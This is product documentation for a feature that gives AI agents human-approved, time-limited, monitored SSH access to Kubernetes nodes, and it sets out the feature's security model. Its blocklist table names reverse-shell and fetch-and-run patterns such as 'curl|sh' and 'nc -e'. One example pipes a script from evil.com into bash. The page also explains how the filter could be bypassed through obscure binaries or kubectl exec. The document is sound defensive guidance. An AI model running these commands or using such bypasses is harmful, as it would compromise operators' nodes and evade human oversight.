Node SSH Access

How AI agents get time-limited SSH access to your nodes, the security model, known risks, and what you should prepare before enabling it

PodWarden lets AI agents request SSH access to your Kubernetes nodes for troubleshooting. This page explains exactly how it works, what can go wrong, and what you need to do to stay safe.

Read this entire page before enabling Node SSH Access on any MCP token.

Why this exists

AI agents connected via MCP are effective at managing workloads, but some problems require looking at the node itself — checking journalctl logs, inspecting kubectl output from a specific node, diagnosing network issues with ip or ss, checking disk usage. Without SSH access, the agent has to describe the commands and you have to run them manually.

Node SSH Access lets the agent run these commands directly, but only after you explicitly approve each session in a live-monitored dashboard.

Consider run_in_pod first. For tasks inside application containers — fixing PVC permissions, running app CLI tools, checking config files, debugging connectivity — use run_in_pod instead. It requires no approval ceremony, no SSH grants, and is isolated to the container. Only use Node SSH Access for node-level operations like journalctl, systemctl, or ip addr. See Agent Best Practices for a comparison.

The full lifecycle

Here is exactly what happens, step by step:

Step-by-step breakdown

Agent requests access. The AI calls request_node_access(host_id, reason, duration). PodWarden creates a pending grant and returns an approval URL.
Agent gives you the URL. The AI cannot approve its own request. It presents the URL and waits.
You open the URL. The approval page shows:
- Which host and cluster the agent wants to access
- The agent's stated reason
- Which MCP token is requesting access
- The session duration (default 5 minutes, max 60 minutes)
- A summary of what commands are allowed and blocked
- A link to this documentation page
You log in fresh. PodWarden requires recent authentication (within 2 minutes) to approve. If you're using OIDC/Keycloak, you'll be prompted to log in again. If you're using local auth, you'll need a fresh sign-in. This prevents approval by stale browser sessions.
You approve. The grant becomes active. The page transitions to a live monitoring dashboard.
Agent runs commands. Each command is validated against the blocklist before execution. You see every command, its output, and whether it was allowed or blocked — in real time via server-sent events.
Session ends. After the configured duration (or when you click Revoke), the grant expires. No more commands can be executed. The dashboard shows a summary of everything that happened.

What the agent can and cannot do

Allowed

The agent can run single commands or commands piped to safe filters:

kubectl get pods -A, kubectl describe node k3s-1, kubectl logs deployment/myapp
journalctl -u k3s --since "1 hour ago" --no-pager
systemctl status k3s, systemctl status containerd
crictl ps, crictl images, crictl logs
df -h, free -m, top -bn1, ps aux, uptime, lsblk
ip addr, ip route, ss -tlnp, ping -c3 10.0.0.1
cat /etc/k3s/config.yaml, ls /var/lib/rancher/k3s/
Any command piped to: grep, head, tail, wc, sort, awk, sed, jq, cut, uniq, tr, column, cat, xargs

Blocked

These patterns are blocked before the command reaches SSH:

Category	Examples	Why
Destructive file ops	`rm -r`, `mkfs`, `dd if=`, `wipefs`	Could destroy data or filesystems
System control	`reboot`, `shutdown`, `poweroff`, `init 0`	Could take the node offline
User management	`passwd`, `useradd`, `userdel`	Could create backdoor accounts
Permission changes	`chmod 777`, `chown -R`	Could weaken file security
K8s destructive	`kubeadm reset`, `k3s-uninstall`, `k3s-agent-uninstall`	Could destroy the cluster
Network destructive	`iptables -F`, `ip link delete`	Could break networking
Service stopping	`systemctl stop/disable/mask sshd/k3s/networking`	Could lock you out
Remote code exec	`curl\|sh`, `wget\|sh`, `python -c`, `perl -e`, `eval`	Could execute arbitrary code
Reverse shells	`nc -l`, `nc -e`	Could open backdoor connections

Blocked shell operators

These shell features are blocked entirely:

Command chaining: ;, &&, || — prevents running multiple commands in sequence
Command substitution: $(...), `...` — prevents embedding commands inside commands
Redirection: >, <, >> — prevents writing to files on the node

Pipes (|) are allowed but only to a restricted set of read-only commands (grep, head, tail, jq, etc.).

Single-quoted strings are safe. Operators inside single quotes are treated as literal text, not shell syntax. This means commands like kubectl get cm -o jsonpath='{.data.config}' or kubectl patch deploy --type merge -p '{"spec":{"replicas":2}}' work correctly — the {, $, and other characters inside the single quotes are not flagged as blocked operators.

Security model

What we trust

Your PodWarden instance. The API server runs the command validation and SSH execution. If someone compromises your PodWarden instance, they already have your SSH keys and don't need this feature.
The SSH key. PodWarden uses the same SSH key it already uses for provisioning. Node SSH Access does not introduce new credentials — it uses existing ones in a more controlled way.
The blocklist. Command validation happens server-side before SSH execution. The AI agent never sees or controls the SSH connection directly.

What we do NOT trust

The AI agent. The agent submits commands as text strings. PodWarden treats every command as potentially hostile and validates it against the blocklist. The agent cannot bypass validation because it never gets direct SSH access — it only gets an API endpoint that happens to run SSH commands after validation.
The MCP token. Having an MCP token with node_ssh_access=enabled only lets the agent create pending grants. A human must still approve each session.
The approval URL. It's a one-time-use link to a pending grant. Opening it doesn't approve anything — you still need to authenticate and click approve.

The approval ceremony

The fresh-login requirement exists because SSH approval should be a deliberate act, not something that happens because you left a browser tab open. The 2-minute window on JWT freshness means:

You must actively log in to approve
A compromised browser session from yesterday cannot approve grants
If you walk away from your computer, pending grants expire in 10 minutes

Known attack vectors

We are transparent about what could go wrong. These are the scenarios we've identified and how we mitigate them, but you should evaluate these risks for your own environment.

1. Blocklist bypass

Risk: The blocklist is pattern-based (regex). A sufficiently creative command could bypass it.

Examples of what the blocklist catches: rm -rf /, reboot, curl http://evil.com/script.sh | bash

Examples that could theoretically bypass it: A command that uses an obscure binary already on the node, or a kubectl exec into a pod that then runs destructive commands inside the container.

Mitigation: The blocklist is defense-in-depth, not the sole security boundary. The real security boundaries are:

The human must approve each session
You watch every command in real time
Sessions expire quickly (default 5 minutes)
You can revoke instantly

What you should do: Understand that the blocklist reduces risk but does not eliminate it. If the agent runs a command you don't recognize, revoke the session immediately.

2. Indirect command execution

Risk: Allowed commands like kubectl exec could be used to run arbitrary commands inside a pod, which then affects the node (e.g., a privileged pod).

Mitigation: This is a Kubernetes security concern, not specific to this feature. If your pods run as privileged or have host mounts, they're already a risk vector regardless of how the kubectl command arrives.

What you should do: Follow Kubernetes security best practices — don't run pods as privileged, use Pod Security Standards, minimize host mounts. These are good practices regardless of whether you use Node SSH Access.

3. Information exfiltration

Risk: The agent can read files and command output. It could read sensitive data (secrets in environment variables, config files with credentials, etc.) and include them in its response to you — which may be logged by the AI provider.

Mitigation: This is inherent to giving any SSH access. The blocklist prevents writing/modifying, but reading is allowed by design (that's the whole point of troubleshooting).

What you should do:

Be aware that command output flows through the AI provider's API
Don't approve SSH access to nodes with sensitive data you wouldn't share with the AI provider
Use Kubernetes secrets (not environment variables) for sensitive values
Consider what's on the node before approving

4. MCP token theft

Risk: If an attacker steals an MCP token with node_ssh_access=enabled, they can create pending grants and submit the approval URL through social engineering.

Mitigation:

Pending grants expire in 10 minutes
Fresh authentication is required to approve
The approval page shows which MCP token is requesting access — if you don't recognize it, deny
Revoke compromised tokens immediately (Settings -> MCP -> trash icon)

What you should do: Treat MCP tokens like API keys. Don't share them. Rotate them periodically. Use the minimum number of tokens with SSH access enabled.

5. Session duration abuse

Risk: The agent requests a long session (up to 60 minutes) and runs many commands that you can't review fast enough.

Mitigation: You choose the approval — if the requested duration seems too long, deny it and ask the agent to request a shorter one. You can also revoke at any time.

What you should do: Start with short durations (5 minutes). Only approve longer sessions when you understand what the agent needs to do. Keep the monitoring dashboard visible.

6. SSH key scope

Risk: The SSH key used for this feature is the same key PodWarden uses for provisioning. If a command exploit leads to key extraction, the attacker has the provisioning key.

Mitigation: The key is written to a temporary file for each command execution and deleted immediately after. The agent never sees the key — only command output.

What you should do: Use separate SSH keys per host where possible (Settings -> Secrets -> SSH key pairs, then assign per host). This limits blast radius if any single key is compromised.

Before you enable this

Checklist

You understand the risks. Read the attack vectors above. This feature gives AI agents controlled access to run commands on your infrastructure.
You have monitoring in place. The live dashboard is your primary control. Don't approve and walk away.
You can recover. Know how to restore your nodes if something goes wrong. Have backups. Know how to re-provision a node with PodWarden if it gets into a bad state.
You've limited the blast radius.
- Enable node_ssh_access on as few MCP tokens as possible
- Use dedicated SSH keys per host
- Keep session durations short
You trust the AI provider. Command output passes through the AI provider's API. If your nodes contain data you can't share with the provider, don't approve SSH access to those nodes.
You know how to revoke. Both from the monitoring dashboard (big red button) and from the MCP token settings page (revoke the entire token).

Enabling Node SSH Access

Per-token toggle

Node SSH Access is disabled by default on all MCP tokens. To enable it:

Go to Settings -> MCP
Find the token in the table
Toggle the SSH column switch to on (green)

This only allows the token to request access. A human must still approve each session.

Disabling

Toggle the switch back to off, or revoke the token entirely. Any active grants from that token will continue until they expire — they are not retroactively revoked when you disable the token setting. To immediately stop an active session, use the Revoke button on the monitoring dashboard.

Monitoring a session

When you approve an SSH access grant, the page becomes a live monitoring dashboard:

Countdown timer shows remaining time with a progress bar. Turns red when under 60 seconds.
Revoke button immediately terminates the session. Always visible.
Command log shows every command the agent submits:
- Green border: command succeeded (exit code 0)
- Amber border: command ran but returned non-zero exit code
- Red background: command was blocked by the validation rules
- Each entry shows the command, execution time, stdout, and stderr

The log auto-scrolls to the latest entry. After the session ends, the log remains visible as an audit record for that browser tab.

FAQ

Can the agent approve its own request?

No. Approval requires a JWT from a human admin who logged in within the last 2 minutes. MCP tokens cannot approve grants.

What happens if my browser closes during an active session?

The session continues until it expires. The agent can still run commands. You can reopen the approval URL to reconnect to the monitoring stream. To stop the session early, reopen the URL and click Revoke.

Are commands logged permanently?

No. Grants and their command logs are stored in memory only. They're cleaned up 1 hour after the session ends. If PodWarden restarts, all grants are lost. For permanent audit trails, use the MCP Activity Log which records all API calls including command executions.

Can I restrict which hosts the agent can access?

Currently, any host in PodWarden can be requested. The control is at the approval step — you decide whether to approve each request based on the target host. Per-host restrictions may be added in a future release.

What if the agent requests access and I'm not available?

Pending grants expire after 10 minutes. The agent will get an expiry notice and would need to request again when you're available.

Does this work without OIDC/Keycloak?

Yes. If you use local authentication (username/password), the approval page redirects to the local sign-in page. The fresh-login requirement still applies — your JWT must have been issued within the last 2 minutes.

Can multiple agents have active sessions on the same node?

Yes. Each grant is independent. This is by design for cases where you might have different agents troubleshooting different issues. Each session has its own monitoring dashboard.